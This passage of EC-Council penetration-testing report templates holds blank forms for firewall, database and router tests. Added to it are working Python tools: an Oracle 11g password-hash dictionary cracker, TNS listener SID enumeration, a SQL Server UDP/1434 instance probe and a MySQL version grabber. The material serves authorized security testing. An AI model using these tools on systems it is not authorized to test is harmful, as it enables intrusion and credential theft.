9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 6: Grab the banner

Target Organization
URL
Banner Message

Firewall Vendor 1.
2.
3.

Firewall Version 1.
2.
3.

Running Services 1.
2.
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 7: Create custom packets and look for firewall responses

Target Organization
URL
IP of Tested Firewall
S. No. Custom Packet Response
1.

2.

3.

4.

5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 8: Test access control enumeration

Target Organization
URL
IP of Tested Firewall
Access Controls 1.
2.
3.
4.
5.
6.
7.
8.
9.
10.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 9: Identify the firewall architecture

Target Organization
URL
IP of Tested Firewall
Firewall Architecture Details

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 10: Test the firewall policy

Target Organization
URL
Firewall Configuration Policy is Available Yes No
Firewall is Configured as per Policy Yes No
Firewall Policy Defines All Expected Standard Configuration Yes No
Gap Between Policy and Firewall Implementation

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 11: Test the firewall using a firewalking tool

Target Organization
URL
Firewalking Technique used Traceroute Scanning
IP of Tested Firewall
Internal IPs Discovered 1.
2.
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 12: Test for port redirection

Target Organization
URL
IP of Tested Firewall
Port Redirection Results

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 13: Test the firewall from both sides

Target Organization
URL
IP of Tested Firewall
Unauthorized connections from the internal network to the Internet can be created Yes No
Vulnerabilities identified by scanners 1.
2.
3.
4.
5.

Reaction of the firewall to fragmented and spoofed packets

Identified Firewall Rules 1.
2.
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 14: Overt firewall test from outside

Target Organization
URL
IP of Tested Firewall
Unauthorized Connections from the Internal Network to the Internet can be Created Yes No
Vulnerabilities Identified by Scanners 1.
2.
3.
4.
5.

Reaction of the Firewall to Fragmented and Spoofed Packets

Identified Firewall Rules 1.
2.
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 15: Test covert channels

Target Organization
URL
IP of Tested Firewall
Successfully installed Backdoor on a Victim Machine inside the Network Yes No
Successfully Established Reverse Connection to a Machine Outside the Firewall Yes No
Successfully Bypassed Firewall and Router Security Restrictions Yes No
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 16: Covert firewall test from outside

Target Organization
URL
IP of Tested Firewall
Unauthorized Connections from the Internet to the Internal Network can be Created Yes No
Vulnerabilities Identified by Scanners 1.
2.
3.
4.
5.

Reaction of the Firewall to Fragmented and Spoofed Packets

Identified Firewall Rules 1.
2.
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 17: Try to bypass firewall using IP address spoofing

Target Organization
URL
IP of Tested Firewall
Modified Addressing Information

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 18: Try to bypass the firewall using tiny fragments

Target Organization
URL
IP of Tested Firewall
TCP packet header information
IDS filter rules 1.
2.
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 19: Try to bypass the firewall using IP address in place of URL

Target Organization
URL
IP of Tested Firewall
Domain Names 1.
2.
3.
4.
5.

IP Address of the Blocked Website
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 20: Try to bypass the firewall using anonymous website surfing sites

Target Organization
URL
IP of Tested Firewall
Anonymous Website Surfing Sites 1.
2.
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 21: Try to bypass the firewall using a proxy server

Target Organization
URL
IP of Tested Firewall
IP Address of the Proxy Server
Port Number
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 22: Try to bypass the firewall using source routing

Target Organization
URL
IP of Tested Firewall
Address Information Modified Address Information

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 23: Test HTTP tunneling method

Target Organization
URL
IP of Tested Firewall
Company has a public web server with port 80 used for HTTP traffic Yes No
Firewall examines the payload of an HTTP packet Yes No
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 24: Test ICMP tunneling method

Target Organization
URL
IP of Tested Firewall
ICMP Tunneling Technique Results

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 25: Test ACK tunneling method

Target Organization
URL
IP of Tested Firewall
ACK Tunneling Technique Results

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 26: Test SSH tunneling method

Target Organization
URL
IP of Tested Firewall
SSH Tunneling Technique Results

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 27: Try to bypass firewall through MITM attack

Target Organization
URL
IP of Tested Firewall
DNS server
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 28: Try to bypass firewall using malicious contents

Target Organization
URL
IP of Tested Firewall
Malicious Content Used against Firewall

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 29: Test firewall-specific vulnerabilities

Target Organization
URL
IP of Tested Firewall
List Product Specific Exploits against Firewall Vulnerabilities 1.
2.
3.
4.
5.

Response Received from Implementation of Product Specific Exploits against Firewall Vulnerabilities
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

EC-Council Licensed Penetration
Tester

Methodology: Database Penetration Testing

Penetration Tester:
Organization:
Date: Location:

Confidential 1 Template DPT/12

Test 1: Perform database port scanning

Target Organization
URL
Port Database uses
Is the Port open? Yes No
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 2: Sniff database-related traffic on the local wire

Target Organization
URL
Target IP Addresses 1.
2.
3.
4.
5.

Data Packets related to Database 1.
2.
3.
4.
5.

Number of Database Connections
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Test 3: Test for weak passwords, default accounts on databases

Target Organization
URL
Databases Present on the Network 1.
2.
3.
4.
5.

Does the Database have Latest Patches applied? Yes No


Weak Passwords 1.
2.
3.
4.
5.

Default accounts 1.
2.
3.
4.
5.

Other threats 1.
2.
3.
4.
5.
6.
7.
8.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 4: Perform Google hacking for database errors

Target Organization
URL
Database errors 1.
2.
3.
4.
5.

Databases Connected to the Network
1.
2.
3.
4.
5.

Database Vulnerabilities
1.
2.
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.


Results Analysis:


Test 5: Exploit web applications to retrieve information about Oracle databases running at the backend

Target Organization
URL
Retrieved Database Information via Error Messages in Vulnerable Web Applications
1.
2.
3.
4.
5.

Oracle Database Version Used at the Backend
List of All Usernames in the Oracle (11g) Database
1.
2.
3.
4.
5.

List of All User Tables and the Number of Rows in the Oracle (11g) Database
1.
2.
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.


Results Analysis:


Test 6: Identify the version numbers used by the database

Target Organization
URL
Version Information of the Oracle Database
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 7: Determine Oracle version using Metasploit

Target Organization
URL
Determined Oracle Version
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 8: Identify the password management in Oracle

Target Organization
URL
Number of Weak Passwords
List of Accounts Having Weak Passwords
1.
2.
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 9: Identify EXECUTE privileges granted to PUBLIC on Oracle

Target Organization
URL
Identified EXECUTE Privileges Granted to PUBLIC on Oracle
1.
2.
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 10: Identify privilege escalation via cursor technique in Oracle

Target Organization
URL
Identified Privilege Escalation Using the Cursor Technique in the Oracle Database
1.
2.
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 11: Identify public privileges from object types

Target Organization
URL
Identified Public Privileges from Object Types
1.
2.
3.

Transferred Data Out of the Database Using SQL Injection Attacks
1.
2.
3.
4.

Oracle Audited Entries
1.
2.
3.
4.
5.

SQL Statements Submitted to the Database
1.
2.
3.
4.
5.

Information Gathered from Audited Tables
1.
2.
3.
4.
5.


Attacks that Can Bypass the Protections Provided by Oracle Database Vault
1.
2.
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 12: Identify Oracle Java vulnerabilities in SQL injection

Target Organization
URL
Identified Oracle Java Vulnerabilities in SQL Injection
1.
2.
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 13: Determine Oracle service ID (SID) using Metasploit

Target Organization
URL
Techniques Used to Determine the Service ID
1.
2.
3.

Determined Oracle Service ID (SID) Using Metasploit
1.
2.
3.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 14: Identify attacks against the target database using a simulated user

Target Organization
URL
Script to Detect Flaws in the DBMS_METADATA.GET_DDL Function in Oracle
Identified Attacks Against the Target Database Using a Simulated User
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 15: Scan for other default ports used by the Oracle database

Target Organization
URL
Default Ports Used by the Oracle Database
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
36.
37.
38.
39.
40.

List of Open Ports Discovered on a Computer/Server
1.
2.
3.
4.
5.


Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 16: Scan for non-default ports used by the Oracle database

Target Organization
URL
List of Non-Default Ports Used by the Oracle Database
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 17: Identify the instance names used by the Oracle database

Target Organization
URL
Unique Names Specified While Configuring an Instance of the Notification Services
1.
2.
3.

Identified Instance Database Objects
1.
2.
3.
4.

Instance Name Criteria
1.
2.
3.
4.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 18: Attempt to brute-force password hashes from the Oracle database

Target Organization
URL
Passwords Recovered by Brute-Forcing Password Hashes from the Database
Location of Oracle Password Hashes
1.
2.
3.
4.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:
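Added example for Test 18 (editor-supplied, not part of the EC-Council template): a dictionary attack on Oracle 11g password hashes. The hashes live in SYS.USER$ (readable with SYSDBA or SELECT ANY DICTIONARY): the PASSWORD column holds the 10g DES-based hash, which this example does not handle, and SPARE4 holds the 11g value 'S:' followed by hex(SHA-1(password || salt)) and hex(salt), with a 10-byte salt. The hash and wordlist below are constructed for the demo.

```python
"""Added example (not part of the EC-Council template): dictionary attack on
Oracle 11g 'S:' password hashes for Test 18. Hashes live in SYS.USER$: the
PASSWORD column holds the 10g DES-based hash (not handled here) and SPARE4
holds the 11g value 'S:' + hex(SHA-1(password || salt)) + hex(salt) with a
10-byte salt. The hash and wordlist below are constructed for the demo.
"""
import hashlib

def oracle11g_hash(password: str, salt: bytes) -> str:
    """SPARE4-style 'S:' string for a password and its 10-byte salt."""
    if len(salt) != 10:
        raise ValueError("Oracle 11g salts are 10 bytes")
    digest = hashlib.sha1(password.encode("utf-8") + salt).hexdigest()
    return "S:" + (digest + salt.hex()).upper()

def parse_spare4(spare4: str):
    """Return (sha1_hex, salt) from a SPARE4 value. Later releases append
    ';H:...' (and ';T:...') parts; only the S: part is needed here."""
    for part in spare4.split(";"):
        if part.startswith("S:") and len(part) == 62:
            body = part[2:].lower()
            return body[:40], bytes.fromhex(body[40:])
    raise ValueError("no S: hash in SPARE4 value")

def crack_11g(spare4: str, wordlist):
    """Return the first wordlist entry whose salted SHA-1 matches, else None.
    Passwords are case-sensitive in 11g, so feed case variants explicitly."""
    target, salt = parse_spare4(spare4)
    for word in wordlist:
        if hashlib.sha1(word.encode("utf-8") + salt).hexdigest() == target:
            return word
    return None

# Constructed demo row: a user whose password is 'oracle'.
DEMO_SALT = bytes.fromhex("0102030405060708090a")
DEMO_SPARE4 = oracle11g_hash("oracle", DEMO_SALT)
DEMO_WORDLIST = ["manager", "change_on_install", "tiger", "oracle", "welcome1"]

if __name__ == "__main__":
    print(DEMO_SPARE4)
    print(crack_11g(DEMO_SPARE4, DEMO_WORDLIST))
```

Because the salt is per user, every candidate must be hashed once per account; for a real wordlist move the loop to hashcat or John with the 11g format and keep this code for spot checks.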


Test 19: Check the status of the TNS Listener running at Oracle server

Target Organization
URL
Status of the TNS Listener Running at the Oracle Server
SID Retrieved from an Unprotected Listener
Files that Control the Listener
1.
2.
3.
4.
5.

Mode Used to Configure the Listener
Database PLSExtProc Executable

Tools/Services Used 1.
2.
3.
4.
5.


Results Analysis:


Test 20: Try to log in using default account passwords

Target Organization
URL
Attempted Login Using Default Account Passwords
Account Password
1. 1.
2. 2.
3. 3.
4. 4.
5. 5.
6. 6.
Attempted Login Successful YES NO
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 21: Try to enumerate SIDs

Target Organization
URL
Default User Names and Passwords after SID Enumeration
User Names Passwords
1. 1.
2. 2.
3. 3.
4. 4.
5. 5.
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:
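Added example for Tests 13, 19 and 21 (editor-supplied, not part of the EC-Council template): the raw TNS listener exchange those tests rely on. build_tns_connect() produces the CONNECT packet that tnscmd and the Metasploit Oracle modules send; parse_tns_string() reads the listener's parenthesised reply; classify_sid_reply() turns the answer to a CONNECT for a guessed SID into known/unknown (a wrong SID is refused with ERR=12505 on older listeners and 12514 on newer ones). Host names, ports and SIDs are placeholders and the sample replies are constructed.

```python
"""Added example (not part of the EC-Council template): raw TNS listener
exchange for Tests 13, 19 and 21. Host names, ports and SIDs are placeholders;
the reply packets used by the demo are constructed.
"""
import socket
import struct

def build_tns_connect(connect_data: bytes) -> bytes:
    """TNS CONNECT: 8-byte packet header, 50-byte connect header (connect data
    always starts at offset 0x3a), then the connect string."""
    hdr = struct.pack(">HHBBH", 0, 0, 1, 0, 0)      # length, checksum, type=1 (CONNECT), reserved, hdr checksum
    body = struct.pack(">HHHHHHHHHHIBB",
                       0x0136, 0x012C,               # version, lowest compatible version
                       0x0000, 0x0800, 0x7FFF,       # service options, SDU, TDU
                       0x7F08, 0x0000, 0x0001,       # NT characteristics, max packets, byte order
                       len(connect_data), 0x003A,    # connect data length and offset
                       0, 0, 0)                      # max receivable connect data, flags0, flags1
    body += b"\x00" * 24                             # trace items, unique connection id, unused
    pkt = hdr + body + connect_data
    return struct.pack(">H", len(pkt)) + pkt[2:]

def status_request() -> bytes:
    """Test 19: ask the listener for its status. 10g and later listeners that
    enforce local OS authentication refuse this from a remote host."""
    return build_tns_connect(b"(CONNECT_DATA=(COMMAND=status))")

def sid_request(sid: str, host: str, port: int = 1521) -> bytes:
    """Tests 13 and 21: an ordinary CONNECT naming one SID."""
    cd = ("(DESCRIPTION=(CONNECT_DATA=(SID=%s)(CID=(PROGRAM=)(HOST=probe)(USER=probe)))"
          "(ADDRESS=(PROTOCOL=TCP)(HOST=%s)(PORT=%d)))" % (sid, host, port))
    return build_tns_connect(cd.encode("ascii"))

def parse_tns_string(text: str):
    """Parse '(KEY=VALUE)(KEY=(SUB=...))' into nested dicts; repeated keys
    become lists. Quoted values may contain parentheses (ERROR_STACK ARGS)."""
    def parse_items(pos):
        out = {}
        while pos < len(text) and text[pos] == "(":
            key, value, pos = parse_item(pos)
            if key in out:
                out[key] = out[key] if isinstance(out[key], list) else [out[key]]
                out[key].append(value)
            else:
                out[key] = value
            while pos < len(text) and text[pos].isspace():
                pos += 1
        return out, pos

    def parse_item(pos):
        eq = text.index("=", pos)
        key, pos = text[pos + 1:eq].strip(), eq + 1
        if text[pos] == "(":
            value, pos = parse_items(pos)
        elif text[pos] == "'":
            end = text.index("'", pos + 1)
            value, pos = text[pos + 1:end], end + 1
        else:
            end = text.index(")", pos)
            value, pos = text[pos:end], end
        if text[pos] != ")":
            raise ValueError("malformed TNS string near offset %d" % pos)
        return key, value, pos + 1

    return parse_items(0)[0]

def extract_tns_text(packet: bytes) -> str:
    """The parenthesised payload of a REFUSE/DATA packet ('' if none)."""
    start, end = packet.find(b"("), packet.rfind(b")")
    return packet[start:end + 1].decode("latin-1") if 0 <= start < end else ""

SID_UNKNOWN_CODES = {"12505", "12514"}

def classify_sid_reply(packet: bytes) -> str:
    """'known' when the listener accepts/redirects, 'unknown' on ERR 12505/12514."""
    if len(packet) < 8:
        return "no reply"
    if packet[4] in (2, 5):                          # ACCEPT or REDIRECT packet type
        return "known"
    desc = parse_tns_string(extract_tns_text(packet)).get("DESCRIPTION", {})
    err = str(desc.get("ERR", "")) if isinstance(desc, dict) else ""
    return "unknown" if err in SID_UNKNOWN_CODES else "refused (ERR=%s)" % err

def tns_exchange(host: str, port: int, connect_data: bytes, timeout: float = 5.0) -> bytes:
    """Send one CONNECT and collect everything the listener sends back."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_tns_connect(connect_data))
        chunks = []
        try:
            while True:
                buf = s.recv(4096)
                if not buf:
                    break
                chunks.append(buf)
        except socket.timeout:
            pass
    return b"".join(chunks)

# Constructed replies: a REFUSE for an unknown SID and a bare ACCEPT.
REFUSE_TEXT = b"(DESCRIPTION=(TMP=)(VSNNUM=186647040)(ERR=12505)(ERROR_STACK=(ERROR=(CODE=12505)(EMFI=4))))"
SAMPLE_REFUSE = (struct.pack(">HHBBH", 12 + len(REFUSE_TEXT), 0, 4, 0, 0) + b"\x01\x00"
                 + struct.pack(">H", len(REFUSE_TEXT)) + REFUSE_TEXT)
SAMPLE_ACCEPT = struct.pack(">HHBBH", 24, 0, 2, 0, 0) + b"\x00" * 16
STATUS_TEXT = ("(DESCRIPTION=(TMP=)(VSNNUM=186647040)(ERR=0)(ALIAS=LISTENER)(SECURITY=OFF)"
               "(VERSION=TNSLSNR for Linux: Version 11.2.0.1.0 - Production)(SNMP=OFF)(PID=4242))")

if __name__ == "__main__":
    print(classify_sid_reply(SAMPLE_REFUSE), classify_sid_reply(SAMPLE_ACCEPT))
    print(parse_tns_string(STATUS_TEXT)["DESCRIPTION"]["VERSION"])
```

For Test 21, loop sid_request() over a SID wordlist against tns_exchange(host, 1521, ...) and keep the names that classify as known; the VERSION and SECURITY fields of a successful status reply fill the Test 19 rows.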


Test 22: Use SQL *Plus to enumerate system tables

Target Organization
URL
Command Used to Establish a Connection to a Remote User
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 23: Extract SQL server database information

Target Organization
URL
SQL Server Database Information
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 24: Test for direct access interrogation

Target Organization
URL
Directly Accessed Data Structures
Special Queries Used to Directly Interrogate the Database
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 25: Test for SQL Server Resolution Service (SSRS)

Target Organization
URL
Referral Services Provided for Multiple Server Instances Running on the Same Machine
UDP Port 1434 Scan Results for the SQL Server Resolution Service
Hidden Database Instances
1.
2.
3.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 26: Test for buffer overflow in the pwdencrypt() function

Target Organization
URL
Unchecked Buffer in the Password Encryption Procedure
Identified Incorrect Permission on the SQL Server Service Account Registry Key
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 27: Test for heap/stack buffer overflow in SSRS

Target Organization
URL
Scan Results for UDP Port 1434 at the Firewall
1.
2.
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:
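Added example for Tests 23, 25 and 27 (editor-supplied, not part of the EC-Council template): a probe of the SQL Server Resolution Service on UDP/1434. It builds the MS-SSRP CLNT_UCAST_EX request, parses the SVR_RESP answer into one record per instance (name, version, TCP port, named pipe), and gives a CLNT_UCAST_INST builder for asking about a guessed instance name. An empty result means either no Browser service or UDP/1434 filtered at the firewall, which is the Test 27 field; whether an instance marked hidden answers either request is not something this code can assume. The host name is a placeholder and the response used offline is constructed.

```python
"""Added example (not part of the EC-Council template): SQL Server Resolution
Service (SSRP, UDP/1434) probe for Tests 23, 25 and 27. Offline demo uses a
constructed SVR_RESP; host names are placeholders.
"""
import socket
import struct

CLNT_UCAST_EX = b"\x03"            # "list every instance on this host"

def clnt_ucast_inst(instance: str) -> bytes:
    """CLNT_UCAST_INST: ask about one named instance (0x04 + name + NUL)."""
    return b"\x04" + instance.encode("ascii") + b"\x00"

def parse_svr_resp(data: bytes) -> list:
    """Parse SVR_RESP: 0x05, little-endian uint16 length, then ';'-separated
    key/value text with instances separated by ';;'. Returns a list of dicts."""
    if len(data) < 3 or data[0] != 0x05:
        raise ValueError("not an SSRP SVR_RESP packet")
    (size,) = struct.unpack_from("<H", data, 1)
    body = data[3:3 + size].decode("latin-1")
    instances = []
    for chunk in body.split(";;"):
        fields = chunk.split(";")
        if len(fields) < 2 or not fields[0]:
            continue
        instances.append({fields[i]: fields[i + 1] for i in range(0, len(fields) - 1, 2)})
    return instances

def tcp_port_of(rec: dict):
    """Advertised TCP port of an instance, or None when only named pipes are on."""
    return int(rec["tcp"]) if rec.get("tcp", "").isdigit() else None

def probe_ssrp(host: str, timeout: float = 2.0, request: bytes = CLNT_UCAST_EX) -> list:
    """Send one SSRP request to host:1434/udp and return the parsed instances.
    [] means no reply: no Browser service, or UDP/1434 filtered (Test 27)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(request, (host, 1434))
        try:
            data, _ = s.recvfrom(65535)
        except socket.timeout:
            return []
    return parse_svr_resp(data)

# Constructed SVR_RESP shaped like a reply from a host running two instances.
SAMPLE_BODY = (b"ServerName;DBHOST;InstanceName;MSSQLSERVER;IsClustered;No;"
               b"Version;10.50.1600.1;tcp;1433;;"
               b"ServerName;DBHOST;InstanceName;SQLEXPRESS;IsClustered;No;"
               b"Version;11.0.2100.60;tcp;49170;np;\\\\DBHOST\\pipe\\MSSQL$SQLEXPRESS\\sql\\query;;")
SAMPLE_RESP = b"\x05" + struct.pack("<H", len(SAMPLE_BODY)) + SAMPLE_BODY

if __name__ == "__main__":
    for rec in parse_svr_resp(SAMPLE_RESP):
        print(rec["InstanceName"], rec["Version"], "tcp", tcp_port_of(rec))
```

The Version string is the engine build, which fills the Test 23 row without touching the TDS port; the tcp value is where to point the later tests for that instance.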


Test 28: Test for buffer overflows in the extended stored procedures

Target Organization
URL
List of Extended Stored Procedures that Cause a Stack Buffer Overflow
Publicly Accessible Database Queries Loaded and Executed
Database Query that Calls One of the Affected Functions
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 29: Test for service account registry key

Target Organization
URL
Test Results for the Altered SQL Service Account Registry Key
1.
2.
3.
4.
5.

Escalated Privileges that Weaken the Security Policy of SQL Server
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 30: Test the stored procedure to run web tasks

Target Organization
URL
Test Results for the Stored Procedure to Run Web Tasks
1.
2.
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 31: Attempt direct-exploit attacks

Target Organization
URL
Code Injection Performed to Gain Unauthorized Command Line Access
1.
2.
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 32: Retrieve all login accounts using T-SQL query

Target Organization
URL
List of Login Accounts on the MS SQL Server Database
1.
2.
3.
4.
5.

SQL Login Accounts
1.
2.
3.
4.
5.

Windows Login 1.
Accounts 2.
3.
4.
5.

Windows Group 1.
Login Accounts 2.
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 33: Brute-force the SA account

Target Organization
URL
Retrieved Password by Brute-forcing the SA Account
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 34: Extract the version of the MySQL server database being used

Target Organization
URL
Extracted Version of the MySQL Server Database Being Used
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:
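Added example for Test 34 (editor-supplied, not part of the EC-Council template): the MySQL server version read straight from the initial handshake. The server sends its greeting before any authentication, so the version string, connection id, capability flags (including TLS support) and authentication plugin are available to anyone who can reach 3306/tcp; when the client host is not allowed, a pre-authentication ERR packet arrives instead and its message still confirms a MySQL server. Both sample packets below are constructed.

```python
"""Added example (not part of the EC-Council template): extract the MySQL
version from the HandshakeV10 greeting for Test 34. Sample packets below are
constructed; host is a placeholder.
"""
import socket
import struct

CLIENT_SSL = 0x0800
CLIENT_SECURE_CONNECTION = 0x8000
CLIENT_PLUGIN_AUTH = 0x00080000

def parse_mysql_greeting(packet: bytes) -> dict:
    """Parse a protocol-10 HandshakeV10 greeting, or the pre-auth ERR packet."""
    plen = int.from_bytes(packet[:3], "little")           # 3-byte payload length, 1-byte sequence id
    p = packet[4:4 + plen]
    if p[0] == 0xFF:                                      # ERR: 0xff, code, message (no sqlstate pre-auth)
        return {"error": int.from_bytes(p[1:3], "little"), "message": p[3:].decode("latin-1")}
    if p[0] != 10:
        raise ValueError("unsupported protocol version %d" % p[0])
    end = p.index(b"\x00", 1)
    version = p[1:end].decode("latin-1")
    pos = end + 1
    thread_id = int.from_bytes(p[pos:pos + 4], "little")
    pos += 4 + 8 + 1                                      # connection id, auth-plugin-data-part-1, filler
    cap_low = int.from_bytes(p[pos:pos + 2], "little")
    charset = p[pos + 2]
    status = int.from_bytes(p[pos + 3:pos + 5], "little")
    cap_high = int.from_bytes(p[pos + 5:pos + 7], "little")
    auth_len = p[pos + 7]
    pos += 8 + 10                                         # those fields plus 10 reserved bytes
    caps = (cap_high << 16) | cap_low
    if caps & CLIENT_SECURE_CONNECTION:
        pos += max(13, auth_len - 8)                      # auth-plugin-data-part-2
    plugin = p[pos:].split(b"\x00")[0].decode("latin-1") if caps & CLIENT_PLUGIN_AUTH else ""
    return {"version": version, "thread_id": thread_id, "capabilities": caps,
            "tls": bool(caps & CLIENT_SSL), "charset": charset, "status": status,
            "auth_plugin": plugin}

def grab_mysql_greeting(host: str, port: int = 3306, timeout: float = 5.0) -> dict:
    """Connect, read the unsolicited greeting, and parse it (no credentials used)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        data = s.recv(4096)
    return parse_mysql_greeting(data)

def mysql_packet(payload: bytes, seq: int = 0) -> bytes:
    return len(payload).to_bytes(3, "little") + bytes([seq]) + payload

# Constructed greeting in the shape a 5.7 server sends.
SAMPLE_GREETING = mysql_packet(
    b"\x0a" + b"5.7.33-0ubuntu0.18.04.1\x00" + struct.pack("<I", 42) + b"abcdefgh" + b"\x00"
    + struct.pack("<H", 0xFFF7) + b"\x21" + struct.pack("<H", 0x0002) + struct.pack("<H", 0x81FF)
    + b"\x15" + b"\x00" * 10 + b"ijklmnopqrst\x00" + b"mysql_native_password\x00")
# Constructed pre-auth error (ER_HOST_NOT_PRIVILEGED = 1130).
SAMPLE_ERR = mysql_packet(b"\xff" + struct.pack("<H", 1130)
                          + b"Host '203.0.113.7' is not allowed to connect to this MySQL server")

if __name__ == "__main__":
    print(parse_mysql_greeting(SAMPLE_GREETING))
    print(parse_mysql_greeting(SAMPLE_ERR))
```

The auth_plugin field tells you what Test 35 and Test 36 are up against: mysql_native_password is the SHA-1 challenge scheme, caching_sha2_password (8.0 default) needs TLS or the server's RSA key for a password exchange.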


Test 35: Try to log in using default/common passwords

Target Organization
URL
Attempted Login Using Default/ Common Passwords
User Names Passwords
1. 1.
2. 2.
3. 3.
4. 4.
5. 5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 36: Brute-force accounts using dictionary attack

Target Organization
URL
Brute-forced Accounts Using Dictionary Attack
Methods Used to Brute-Force Accounts: Manually / Using Software and Database

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 37: Extract system and user tables from the database

Target Organization
URL
Extracted System and User Table Information from the Database
System Information User Table Information

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

EC-Council Licensed Penetration Tester

Methodology: Router and Switches Penetration Testing

Penetration Tester:
Organization:
Date: Location:

Confidential 1 Template RSPT/18

Router Penetration Testing

Test 1: Identify the router hostname

Target Organization
URL
IP Address of the Router
Hostname of the Router
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 2: Port scan the router

Target Organization
URL
Open Ports
7 Echo
13 Daytime
17 Quote of the Day (QOTD)
20 File Transfer Protocol (FTP data)
21 File Transfer Protocol (FTP control)
22 Secure Shell (SSH)
23 Telnet
25 SMTP
43 Whois
53 Domain Name System (DNS)
66 SQL*Net (Oracle)
70 Gopher
79 Finger
80 HTTP
88 Kerberos
101 Host Name Server
109 Post Office Protocol 2 (POP2)
110 Post Office Protocol 3 (POP3)
113 IDENT
115 Simple File Transfer Protocol (SFTP)
137 NetBIOS Name Service
138 NetBIOS Datagram Service
139 NetBIOS Session Service
143 Internet Message Access Protocol (IMAP)
161 Simple Network Management Protocol (SNMP)
162 SNMP Trap
194 Internet Relay Chat (IRC)
443 HTTPS
Other Ports:
Tools/Services Used 1.
2.
3.
4.
5.


Results Analysis:


Test 3: Identify the router operating system and its version

Target Organization
URL
IP Address of the Router Tested
Operating System and Its Version
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 4: Identify protocols running

Target Organization
URL
IP Address of the Router Tested
Protocols Running: RIP / RIPv2 / IGRP / EIGRP / OSPF / BGP / Others
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 5: Test for packet leakage at the router

Target Organization
URL
IP Address of the Router Tested
Packet Leak YES NO
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 6: Test for router misconfigurations

Target Organization
URL
IP Address of the Router Tested
Is the router misconfigured? YES NO
